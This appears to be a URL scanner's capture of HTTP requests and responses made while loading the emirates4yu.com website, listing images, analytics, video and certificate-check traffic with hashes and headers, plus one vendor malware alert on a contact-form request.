cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F00e89fb5-5cb3-4f68-936b-5ee31d6061bc.jpeg
34.120.237.76 200 OK 8.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F00e89fb5-5cb3-4f68-936b-5ee31d6061bc.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 8b6ee13d43732f7c764a49500d092865
5d15fd672e968d59b541e4d5d0d01cd5e69f4075
fc3623d527147e1c6aab399251ed8d527e6eefdee6ad7183f00df2613498bfe4
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F00e89fb5-5cb3-4f68-936b-5ee31d6061bc.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 8006
x-amzn-requestid: 78aab013-df11-464b-a1c7-ee41b7e77b40
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cIB-AHSrIAMFvKw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637fe38c-4d795f410a57fc2c21d7075d;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 21:35:08 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: NntLZ3wUdcX9kEo-afFLU0TPKgqAlSK3bToNh2mmoqoyLBJINNk7ow==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 caf6806821bc479b28a6f1ce3043b8a6.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 21:54:39 GMT
age: 50843
etag: "5d15fd672e968d59b541e4d5d0d01cd5e69f4075"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fac98a873-8b46-43f5-9ac0-fc1cc1a0cd81.jpeg
34.120.237.76 200 OK 11 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fac98a873-8b46-43f5-9ac0-fc1cc1a0cd81.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 481c033b9ffd030ff0de6e35cf788b47
85d3baad9217af2b5d75c019d2ef95dbb919a788
02443c7869914c2b29892deb0c645395bcf4e8379da3cf20974614ff9c92893b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fac98a873-8b46-43f5-9ac0-fc1cc1a0cd81.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11249
x-amzn-requestid: 8f679d7f-2ea5-4e47-b78d-79af59435a62
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cFPHYHkAIAMFpBg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637ec562-26108a785e910dc3355d58f1;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 01:14:10 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: NKwpIdw2RZNZNh69AF5GNvunA_QfRGClvzcRP3zYwn7c8BLBlt097g==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 325ed3ba58a560748d886354beef39c0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 07:46:20 GMT
age: 15342
etag: "85d3baad9217af2b5d75c019d2ef95dbb919a788"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa9e23502-5ace-42f4-a990-42412dc7e04e.jpeg
34.120.237.76 200 OK 6.4 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa9e23502-5ace-42f4-a990-42412dc7e04e.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash f6292a2988fb4505d0098553b8e99ddc
9b8aafcda0e22edcc16d3048f4b88659d3b42419
16b7b473229c5e519ab81b385c50277424f3f3b2a5d7647035e84ba58e44f3be
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa9e23502-5ace-42f4-a990-42412dc7e04e.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6385
x-amzn-requestid: 4c2a84f7-f038-4f5a-86c2-5c8ce1a48c6e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cI5NVFMAoAMFn7g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63803bee-45c6411c2430e2375f530dd8;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 03:52:14 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: Fj82i9qJmEiUy2DOkkowq8WRyzupMwNyQqu110sJ3o72HEW4yb7bjQ==
via: 1.1 010c0731b9775a983eceaec0f5fa6a2e.cloudfront.net (CloudFront), 1.1 aef00f14752da9aa504d392fd46eff94.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 07:35:26 GMT
age: 15996
etag: "9b8aafcda0e22edcc16d3048f4b88659d3b42419"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg
34.120.237.76 200 OK 4.0 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 4006a9037ab5f28dca62b0aa7a704c41
74cb2ccd6ae38b171bfbe5a74f0eccb09aa3836b
556ae6516a1f272a96569a3637858292731a34e82672b682f6e7442ca68f4b1d
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 3955
x-amzn-requestid: 42c8d309-a8d2-47cc-8d97-c7fa3a63f8cd
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cCM9NGJHoAMF4sQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d8eba-2a06cda9346bd02c46955444;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 03:08:42 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 5MlzpHpq7auKLSAYikINuPAylXI11VJL3xxIJ9Dyub-7rjQaPfg0WQ==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 7e87179efaa9e3c316bd3d3a74cfded8.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 04:23:00 GMT
age: 27542
etag: "74cb2ccd6ae38b171bfbe5a74f0eccb09aa3836b"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
emirates4yu.com/wp-json/contact-form-7/v1/contact-forms/1637/refill
35.190.203.220 200 OK 2 B URL HTTP/2 emirates4yu.com/wp-json/contact-form-7/v1/contact-forms/1637/refill
IP 35.190.203.220:0
File type JSON data\012- , ASCII text, with no line terminators
Hash d751713988987e9331980363e24189ce
97d170e1550eee4afc0af065b78cda302a97674c
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
Analyzer Verdict Alert fortinet Malware
GET /wp-json/contact-form-7/v1/contact-forms/1637/refill HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://emirates4yu.com/fr/
Connection: keep-alive
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:02 GMT
content-type: application/json; charset=UTF-8
content-length: 2
x-robots-tag: noindex
link: <https://emirates4yu.com/wp-json/>; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link
access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
allow: GET
x-powered-by: WP Engine
x-cacheable: SHORT
vary: Accept-Encoding,Cookie
cache-control: max-age=600, must-revalidate
x-cache: HIT: 5
x-cache-group: normal
accept-ranges: bytes
X-Firefox-Spdy: h2
js-agent.newrelic.com/nr-spa-1216.min.js
151.101.86.137 200 OK 18 kB URL HTTP/2 js-agent.newrelic.com/nr-spa-1216.min.js
IP 151.101.86.137:0
File type ASCII text, with very long lines (32010)
Hash 6561a2403142205f966207d61576f1a6
1310e72f494e12ab63a4280fc1600a2c89dc9bb8
0e496fcab0b9120938373e271fa6631b7da17adf33f8a490637467c170a3e37a
GET /nr-spa-1216.min.js HTTP/1.1
Host: js-agent.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: TAwVDFAylU9PwNPPW/eXC4UyIMC8EQ1d6JNW9Q+uXGnPmL1fuimq9M3lAe733gCMeKNDiCQX1YM=
x-amz-request-id: SYTECJR5CMD8NJ8E
last-modified: Thu, 14 Apr 2022 16:45:57 GMT
etag: "63e2df852d15ab21d7ff8fc4363222e8"
x-amz-version-id: UU.F5jvoumAjQChriwTQHbisCFw_OInU
content-type: application/javascript
server: AmazonS3
cache-control: public, max-age=7200, stale-if-error=604800
content-encoding: gzip
accept-ranges: bytes
date: Fri, 25 Nov 2022 12:02:02 GMT
via: 1.1 varnish
x-served-by: cache-bma1629-BMA
x-cache: HIT
x-cache-hits: 662
x-timer: S1669377722.399128,VS0,VE0
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
content-length: 18216
X-Firefox-Spdy: h2
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d,d7f2cc29,3de7acd7,2c0fbacb/master.json?base64_init=1
23.36.76.194 200 OK 2.4 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d,d7f2cc29,3de7acd7,2c0fbacb/master.json?base64_init=1
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
File type JSON data\012- , ASCII text, with very long lines (11037)
Hash 439b1e074744ace95f568541bd77bbf6
d36f76258b023b30231df56fcbbc82cc2592ab1b
0f5270e0a5bf02e5acfe3ddbdc292c34452cc77cf9529555ba3a335c93736b62
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d,d7f2cc29,3de7acd7,2c0fbacb/master.json?base64_init=1 HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
origin-retrieved-hour: 1657760400
Access-Control-Max-Age: 86400
timing-allow-origin: *
Content-Encoding: gzip
Content-Length: 2389
Aka-c-hit: cache-hit
Cache-Control: max-age=31535956
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
Vary: Accept-Encoding
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
AK-REFERENCE-ID: 0.be4c2417.1669377722.3242141
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
bam.nr-data.net/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=1319&ck=1&ref=https://player.vimeo.com/video/307072005&ap=1&be=508&fe=1014&dc=545&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1669377720745,%22n%22:0,%22f%22:0,%22dn%22:5,%22dne%22:11,%22c%22:11,%22s%22:16,%22ce%22:43,%22rq%22:43,%22rp%22:422,%22rpe%22:426,%22dl%22:496,%22di%22:526,%22ds%22:545,%22de%22:545,%22dc%22:1012,%22l%22:1012,%22le%22:1014%7D,%22navigation%22:%7B%7D%7D&fcp=1192&ja=%7B%22environment%22:%22production%22,%22js_modules%22:true,%22version_js%22:%224.14.1%22,%22version_backend%22:%221.54.5%22,%22visibility_state%22:%22visible%22,%22vimeo_session%22:%22c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721%22,%22locale%22:%22en%22,%22product%22:%22vimeo-vod%22,%22video_embed_permission%22:%22public%22,%22video_privacy%22:%22anybody%22,%22chromecast_test%22:1,%22chromecast_group%22:false,%22stats_fresnel_test%22:1,%22stats_fresnel_group%22:true,%22llhls_timeout_test%22:1,%22llhls_timeout_group%22:false,%22cmcd_test%22:1,%22cmcd_group%22:false%7D&jsonp=NREUM.setToken
162.247.241.14 200 OK 77 B URL HTTP/1.1 bam.nr-data.net/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=1319&ck=1&ref=https://player.vimeo.com/video/307072005&ap=1&be=508&fe=1014&dc=545&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1669377720745,%22n%22:0,%22f%22:0,%22dn%22:5,%22dne%22:11,%22c%22:11,%22s%22:16,%22ce%22:43,%22rq%22:43,%22rp%22:422,%22rpe%22:426,%22dl%22:496,%22di%22:526,%22ds%22:545,%22de%22:545,%22dc%22:1012,%22l%22:1012,%22le%22:1014%7D,%22navigation%22:%7B%7D%7D&fcp=1192&ja=%7B%22environment%22:%22production%22,%22js_modules%22:true,%22version_js%22:%224.14.1%22,%22version_backend%22:%221.54.5%22,%22visibility_state%22:%22visible%22,%22vimeo_session%22:%22c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721%22,%22locale%22:%22en%22,%22product%22:%22vimeo-vod%22,%22video_embed_permission%22:%22public%22,%22video_privacy%22:%22anybody%22,%22chromecast_test%22:1,%22chromecast_group%22:false,%22stats_fresnel_test%22:1,%22stats_fresnel_group%22:true,%22llhls_timeout_test%22:1,%22llhls_timeout_group%22:false,%22cmcd_test%22:1,%22cmcd_group%22:false%7D&jsonp=NREUM.setToken
IP 162.247.241.14:0
File type ASCII text, with no line terminators
Hash f1442f5831dbbe0210da2d7a4180d6b8
2ade23c6c7a001c66f0c0a9a101ec152747b434e
c6acf9fb2ecc1b144c51bd0337bbf1c26db3df2f649ac2da5c56db20d93eb3ef
GET /1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=1319&ck=1&ref=https://player.vimeo.com/video/307072005&ap=1&be=508&fe=1014&dc=545&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1669377720745,%22n%22:0,%22f%22:0,%22dn%22:5,%22dne%22:11,%22c%22:11,%22s%22:16,%22ce%22:43,%22rq%22:43,%22rp%22:422,%22rpe%22:426,%22dl%22:496,%22di%22:526,%22ds%22:545,%22de%22:545,%22dc%22:1012,%22l%22:1012,%22le%22:1014%7D,%22navigation%22:%7B%7D%7D&fcp=1192&ja=%7B%22environment%22:%22production%22,%22js_modules%22:true,%22version_js%22:%224.14.1%22,%22version_backend%22:%221.54.5%22,%22visibility_state%22:%22visible%22,%22vimeo_session%22:%22c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721%22,%22locale%22:%22en%22,%22product%22:%22vimeo-vod%22,%22video_embed_permission%22:%22public%22,%22video_privacy%22:%22anybody%22,%22chromecast_test%22:1,%22chromecast_group%22:false,%22stats_fresnel_test%22:1,%22stats_fresnel_group%22:true,%22llhls_timeout_test%22:1,%22llhls_timeout_group%22:false,%22cmcd_test%22:1,%22cmcd_group%22:false%7D&jsonp=NREUM.setToken HTTP/1.1
Host: bam.nr-data.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 12:02:02 GMT
Content-Type: text/javascript
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 76fa3baf0e460af6-OSL
Access-Control-Allow-Origin: *
Set-Cookie: JSESSIONID=399bbd57267377d7; Path=/; Domain=.nr-data.net; Secure; SameSite=None
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Cross-Origin-Resource-Policy: cross-origin
Vary: Accept-Encoding
Server: cloudflare
Content-Encoding: gzip
www.google-analytics.com/analytics.js
142.250.74.174 200 OK 20 kB URL HTTP/2 www.google-analytics.com/analytics.js
IP 142.250.74.174:0
File type ASCII text, with very long lines (1325)
Hash 47e6f374ca946fddd5b59871b325736c
baa9282efc8785e84d247c3bff518eaa45f101c4
16580b5c87c58e5702e411f1888fdef511094e4cd6d62bb47d16291ffb25985e
GET /analytics.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
strict-transport-security: max-age=10886400; includeSubDomains; preload
x-content-type-options: nosniff
vary: Accept-Encoding
content-encoding: gzip
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 20039
date: Fri, 25 Nov 2022 10:41:08 GMT
expires: Fri, 25 Nov 2022 12:41:08 GMT
cache-control: public, max-age=7200
age: 4854
last-modified: Tue, 27 Sep 2022 22:01:05 GMT
content-type: text/javascript
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash d3d2d21ac304813a16da64921ce18ba4
98b1762c675c61eeb18254986461e6b1074ebc92
af00429c189464ddb8df704dc48035421f943444df6ca17390fb97466c2e7e9b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
googleads.g.doubleclick.net/pagead/viewthroughconversion/942127788/?random=1669377722080&cv=11&fst=1669377722080&bg=ffffff&guid=ON&async=1&gtm=2wgb90&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&auid=385243053.1669377722&rfmt=3&fmt=4
142.250.74.34 200 OK 903 B URL HTTP/2 googleads.g.doubleclick.net/pagead/viewthroughconversion/942127788/?random=1669377722080&cv=11&fst=1669377722080&bg=ffffff&guid=ON&async=1&gtm=2wgb90&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&auid=385243053.1669377722&rfmt=3&fmt=4
IP 142.250.74.34:0
File type ASCII text, with very long lines (1915), with no line terminators
Hash 0cefab80b3360efcf3e12cb0d18a6868
d3d21cf15f150a7e11560036d793d5456a6a1add
ae27cba3d8e55a18bcad9ba0656c1352fc954ea36d58b7b86d6ba483066513e6
GET /pagead/viewthroughconversion/942127788/?random=1669377722080&cv=11&fst=1669377722080&bg=ffffff&guid=ON&async=1&gtm=2wgb90&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&auid=385243053.1669377722&rfmt=3&fmt=4 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 25 Nov 2022 12:02:02 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
content-type: text/javascript; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: br
server: cafe
content-length: 903
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 25-Nov-2022 12:17:02 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3 200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3 200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
